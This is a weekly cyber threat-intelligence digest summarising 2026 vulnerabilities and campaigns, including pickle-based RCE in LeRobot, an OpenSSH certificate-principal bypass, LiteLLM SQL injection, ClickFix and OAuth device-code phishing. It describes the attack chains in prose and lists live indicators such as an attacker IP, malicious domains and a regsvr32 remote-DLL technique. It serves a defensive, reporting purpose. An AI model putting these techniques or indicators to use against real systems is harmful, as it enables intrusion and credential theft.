Cyber Threat Intelligence Digest: Week 17

Executive Summary -
Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Researchers Disclose Critical CVE-2026-25874 in Hugging Face LeRobot Enabling Unauthenticated Remote Code Execution - On 27 April 2026, Resecurity disclosed a critical vulnerability, CVE-2026-25874, in Hugging Face LeRobot, an open-source robotics framework for machine learning. The flaw sits in the async inference PolicyServer, which normally runs on a remote GPU machine and exchanges data with a robot client over gRPC. The server accepts Python pickle data and unpacks it with pickle.loads() before checking what it actually contains. Since the relevant gRPC endpoints require neither authentication nor TLS, anyone who can reach the service can send a malicious pickle payload and run their own code on the server or client. No exploitation in the wild has been reported so far.

Researchers proved the issue using LeRobot v0.4.3 from PyPI, connecting to the PolicyServer over an insecure gRPC channel. They built a pickle object whose reduce() method runs os.system() the moment it is unpacked, then slipped it into the data fields of SendPolicyInstructions() and SendObservations(). The server unpacked the bytes before validating them, so the commands executed even though the call later failed. Their tests copied /etc/passwd to /tmp/x and wrote the output of id to /tmp/lerobot_pwned, confirming full command execution on the host.

OpenSSH Patches CVE-2026-35414 Vulnerability - On 27 April 2026, Cyera disclosed an 8.1-severity OpenSSH vulnerability, CVE-2026-35414, to SecurityWeek. The flaw affects OpenSSH versions released over roughly the past 15 years and was fixed in version 10.3 in early April 2026. Organisations using SSH certificate-based authentication should review their certificate authority principal settings and track down any vulnerable OpenSSH deployments. No active exploitation has been seen so far.

CVE-2026-35414 is an access control bypass tied to the "authorized_keys" principals option in setups that use SSH certificate authorities. Because of reused code, a comma inside a certificate principal, such as "deploy,root", can be read as a list separator during authorisation checks. A user holding a valid certificate from a trusted CA could abuse this to log in as "root" on a vulnerable server. Since OpenSSH treats the login as legitimate, it may not produce authentication-failure logs, making log-based detection unreliable.

NVIDIA Patches Out-of-Bounds Vulnerability CVE-2026-24189 Affecting NVIDIA CUDA-Q - On 21 April 2026, NVIDIA patched an out-of-bounds vulnerability, CVE-2026-24189, affecting all versions of NVIDIA CUDA-Q before 0.14.0. An unauthenticated attacker could trigger an out-of-bounds read by sending a specially crafted request.

A successful exploit may lead to denial-of-service or information disclosure. No exploitation in the wild has been reported. Insikt Group recommends updating NVIDIA CUDA-Q to version 0.14.0 to mitigate the risk.

Potential Threats

Threat Actors Actively Exploit SQL Injection Vulnerability CVE-2026-42208 Affecting LiteLLM - On 27 April 2026, Sysdig reported active exploitation of CVE-2026-42208, a critical SQL injection flaw in LiteLLM versions 1.81.16 through 1.83.6. The bug comes from the Authorization: Bearer header being plugged straight into a database query during proxy API key checks, with no parameter binding. An unauthenticated attacker can read and possibly alter sensitive data in the proxy database, exposing credentials and opening the door to wider access. Sysdig first saw exploitation on 26 April 2026, roughly 36 hours after LiteLLM maintainers disclosed the issue on GitHub.

According to Sysdig, the attacker used crafted Authorization: Bearer headers with UNION-based payloads to map out the database, focusing on three high-value tables: LiteLLM_VerificationToken, litellm_credentials and litellm_config. The activity included column-count discovery and showed prior knowledge of LiteLLM's schema, including the correct Prisma-generated table casing. The attacker then rotated egress IPs, replayed payloads against priority targets and probed the /key/generate and /key/info endpoints without authentication. Sysdig has not attributed the activity to a specific actor and has not seen follow-on use of stolen or virtual keys. Organisations are advised to update LiteLLM to version 1.83.7 or later.

New ClickFix Variant Abuses cmdkey and Regsvr32 for Multi-Action Remote DLL Execution and Persistence - On April 22, 2026, CyberProof published analysis of a new ClickFix variant that uses native Windows utilities for a stealthy, fileless intrusion, abusing cmdkey and regsvr32 to stage credentials and execute remote payloads without dropping malware to disk. The infection starts with a phishing page disguised as a CAPTCHA that instructs the victim to run a command via the Windows Run dialog. That command launches cmd.exe, uses cmdkey to store credentials for an attacker-controlled IP (151.245.195.142), then invokes regsvr32 to fetch and execute a remote DLL, demo.dll, from the resulting SMB share. demo.dll then acts as a loader: its DllRegisterServer export uses schtasks to create a scheduled task called RunNotepadNow, pulling its definition from a remote 777.xml on the same share — letting attackers change behaviour without redeploying anything on the host.

Insikt Group obtained the demo.dll sample (SHA256: b2d9a99d…0108), which sandbox analysis flagged as malicious. It requires regsvr32.exe and performs a wide range of actions: creating the RunNotepadNow task, checking for debuggers, connecting to 151.245.195.142 over SMB (TCP 445, NetBIOS 139), enumerating files and processes, creating a mutex (PSReadLineHistoryFile_443796552) to prevent reinfection, deleting itself after execution, and using csc.exe and cvtres.exe to compile code on the host. It also spawns PowerShell via Task Scheduler to pull a script from lowtideaudio.online, and sends GETs to zyp.ssffaa3.xyz and the Telegram channel telegram.me/mm8hyx - both of which currently return errors.

Threat Actors Abuse Microsoft OAuth Device Code Flow via Kali365 Platform to Capture Tokens Across Multiple Regions - On 24 April 2026, Arctic Wolf reported a large-scale phishing campaign abusing Microsoft's OAuth device authorisation (device code) flow, hitting organisations across education, finance, government, healthcare, insurance and manufacturing in North America, Europe, the Middle East and Africa. The campaign runs on the Kali365 Live phishing-as-a-service platform, which lets attackers grab OAuth tokens or authenticated sessions. The infrastructure leans on reverse proxy services on TCP/8443 that terminate TLS using a shared certificate across multiple nodes and forward traffic to active phishing domains. Attackers send emails impersonating services such as SharePoint, OneDrive, Teams, DocuSign and Adobe, with links or attachments leading to fake landing pages that generate valid Microsoft device codes and tell users to sign in at microsoft[.]com/devicelogin. Once the victim enters the code and completes sign-in, including MFA, the Kali365 backend captures the OAuth access and refresh tokens and stores them for later use, with affiliates able to share captured tokens between each other.

Attackers then use the tokens to reach Microsoft 365 services, including mailboxes, via Microsoft Graph. In some cases they create inbox rules that move and mark as read messages containing keywords like "phish", "link" and "SharePoint" to hide warning emails from the user. The platform also offers a separate cookie-based adversary-in-the-middle mode, which routes victim sessions through attacker infrastructure, proxies the Microsoft login page and captures authenticated session cookies for replay. Affiliates spin up multilingual lures, host them through Cloudflare Workers and use a desktop client to view captured tokens and interact with compromised accounts.

General News

Hackers impersonate Microsoft Teams help desk to breach corporate networks - According to a new report from Mandiant, attackers are impersonating Microsoft Teams help desk staff to trick victims into installing data-stealing malware. The campaign, linked to a newly tracked cluster known as UNC6692, mixes email flooding, phishing messages and malicious browser extensions to break into corporate systems. It starts with a flood of emails aimed at overwhelming a target's inbox, after which the attacker contacts the victim on Microsoft Teams from an account outside the organisation, posing as IT support offering to fix the spam. The victim is then told to install a "patch" to stop the disruption. Clicking the link opens a fake "Mailbox Repair Utility" page, which prompts the user to download a script that installs a malicious browser extension called SnowBelt. SnowBelt acts as a backdoor, letting the attackers keep access to corporate accounts and move through internal systems without re-authenticating. Once in place, it can pull down further tools, including malware named SnowGlaze and SnowBasin, AutoHotkey scripts and a portable Python environment for running more malicious code.

The phishing page itself uses several tricks to push victims towards compromise. If the page is opened in anything other than Microsoft Edge, an overlay nags the user to switch browsers, steering them into the environment where the attack works best. The credential-harvesting script also rejects the first two password attempts on purpose, prompting the victim to type their password again, which both reinforces the illusion of a real system and gives the attackers two captures of the same password to reduce errors in the stolen data. Mandiant researchers said the campaign shows an interesting shift in tactics, combining social engineering, custom malware and a malicious browser extension while abusing the trust users place in common enterprise platforms.

Toronto police arrest three in Canada’s first mobile SMS blaster case - Canadian police have arrested three men in the country's first known criminal case involving a mobile "SMS blaster" - a device that impersonates a cellular tower to send mass phishing texts and disrupt mobile networks. Toronto Police began investigating last November after a tip-off about a suspicious device downtown, and tracked it moving across the Greater Toronto Area. Two suspects were arrested in March and a third turned himself in this week; police seized several SMS blasters and other equipment. Tens of thousands of phones are believed to have connected to the rogue system, and authorities recorded more than 13 million network disruptions, which could temporarily cut phones off from legitimate networks and 911 for seconds to several minutes. Deputy Chief Robert Johnson called it a new and emerging threat that can hit thousands of devices at once.

SMS blasters mimic legitimate base stations, tricking nearby phones into connecting so attackers can push texts impersonating banks or government agencies, usually with links to credential-harvesting sites — a tactic known as smishing. Similar attacks have surfaced in Greece, Thailand, Indonesia, Qatar and the UK, often using kit hidden in vehicles. Last year Thai police arrested two suspects hired by a Chinese handler to blast thousands of phishing messages a day from a car, and a Chinese student in London was jailed in June for a similar setup. Canadian police have not named the suspects or said whether victims lost money, and the investigation is ongoing.

Supreme Court signals location data searches should require a warrant - During oral arguments Monday, the Supreme Court signaled that it is likely to rule that police sweeps of cell phones located in an area surrounding a crime scene qualify as a Fourth Amendment protected search, meaning law enforcement would be required to obtain a warrant before conducting them. While police already typically secure warrants to execute so-called geofence searches, the government argued in Chatrie v. United States that such probes do not trigger Fourth Amendment protections at all. Privacy advocates had worried that a ruling in the government's favor would open the door to much broader use of warrantless reverse searches of all types, including controversial keyword searches in which police ask Google to identify everyone who searched for a particular term. Such a decision could have dramatically expanded the surveillance tools available to investigators without judicial oversight.

By the end of Monday's hearing, however, it seemed clear that a majority of justices were prepared to rule that location data searches require a warrant, a significant win for digital privacy advocates. Several justices appeared to go further, indicating that they see a need to craft an opinion that lays out specific requirements ensuring location data searches are as narrow as possible in scope. That suggests the Court may not only affirm Fourth Amendment protections in this context but also impose meaningful limits on how broadly any individual geofence warrant can sweep, potentially shaping the framework for digital-age surveillance for years to come.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.